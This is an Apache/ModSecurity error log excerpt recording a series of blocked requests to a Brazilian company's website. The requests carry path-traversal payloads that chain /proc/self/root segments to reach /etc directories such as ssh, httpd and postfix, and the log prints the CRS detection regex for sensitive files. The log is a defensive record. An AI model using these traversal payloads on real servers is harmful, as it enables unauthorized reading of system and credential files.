[unique_id "abq3iSmAPhZkrhU8w4l1mwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:42.987794 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:42294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3iimAPhZkrhU8w4l1nQAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:45.334591 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:42304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3jfu8EFLIOrSqIpsL5QAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:46.624961 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:42318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3jsdf6f5d65gmYZTdtAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:49.068037 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:42332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3kQkwaGbbGflqUZAYEAAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:50.837036 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:42176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3kuw_le52K8_3pV3oKwAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:50.858589 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:53858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3kUzinOy1jxa1j4cd4QAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:32:54.505907 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:42184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3lkzinOy1jxa1j4cd7AAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:55.848021 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:42188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3lymAPhZkrhU8w4l1pgAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:59.270582 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:42202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3m_u8EFLIOrSqIpsL9AAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:01.696496 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:52528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3nOw_le52K8_3pV3oMwAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:04.236762 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:52538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3oNa6ubjKNq_cu4ajZQAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:07.223197 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:52544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3okzinOy1jxa1j4cd8AAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:11.118024 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:38742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3p_u8EFLIOrSqIpsL_gAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:33:13.152029 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.243.128:52554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3qSmAPhZkrhU8w4l1tgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:13.678104 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:52554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3qSmAPhZkrhU8w4l1uAAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:14.166079 2026] [mime_magic:error] [pid 15051:tid 140411557287680] (70014)End of file found: [client 57.141.18.0:42504] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:33:14.948899 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:48200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3qta6ubjKNq_cu4ajZgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:17.385571 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:48208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3rSmAPhZkrhU8w4l1vgAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:18.125087 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:57100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3ruoXxyEfFpUF8f91twAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:18.655179 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:48214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3rvu8EFLIOrSqIpsMAAAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:19.943106 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:45620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3r9Y0UrI5A3LftIy3XwAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:33:21.451611 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:45630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3sQkwaGbbGflqUZAYLQAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
